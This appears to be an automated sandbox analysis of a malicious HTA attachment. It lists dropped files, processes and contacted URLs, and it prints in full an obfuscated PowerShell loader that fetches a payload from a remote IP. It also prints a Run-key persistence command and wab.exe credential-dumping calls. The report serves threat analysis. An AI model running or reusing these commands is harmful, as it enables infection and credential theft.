Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
|
HTML document, ASCII text, with very long lines (335), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\mvourhjs.dat
|
data
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x4e16ba81, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anlhyd2a.ak3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogm1bns0.mhm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wssq5mjn.q0w.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcaoq430.eu4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv5CE7.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\chp62E3.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie
0x21, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\chp6361.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Idealogical143.cho
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 78
|
ASCII text, with very long lines (786)
|
downloaded
|
There are 15 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function
Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic;
$Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){.
($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over
quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov
alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1
arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage
GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol
1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede
'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC
UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid
erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee
FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\
CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase
');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B
ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s
moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora
');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn
Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B
KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg
SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole
.ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne
(Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$
Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech
P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw
No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde
Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r:
HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s
Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl
geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk
Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub
sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi
clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied
,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn
Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g
CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC
OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp
lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky
ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen
ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg
Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp
deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op..
gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se
)Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf
eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun
7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function
Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic;
$Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){.
($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over
quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov
alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1
arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage
GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol
1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede
'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC
UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid
erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee
FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\
CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase
');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B
ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s
moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora
');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn
Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B
KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg
SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole
.ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne
(Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$
Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech
P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw
No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde
Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r:
HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s
Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl
geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk
Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub
sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi
clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied
,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn
Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g
CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC
OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp
lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky
ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen
ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg
Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp
deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op..
gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se
)Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf
eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun
7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ
/d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty
-Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
http://87.121.105.163/Subumbilical.dwpXR
|
unknown
|
||
|
http://geoplugin.net/i
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE
|
unknown
|
||
|
http://geoplugin.net/json.gp0
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://geoplugin.net/json.gpI
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
|
142.250.80.100
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://www.imvu.comata
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u
|
unknown
|
||
|
http://geoplugin.net/json.gp_
|
unknown
|
||
|
http://geoplugin.net/json.gprqDS
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpg
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
142.250.80.100
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://www.google.com/async/newtab_promos
|
142.250.80.100
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
https://www.google.com/async/ddljson?async=ntp:2
|
142.250.80.100
|
||
|
http://87.121.108
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
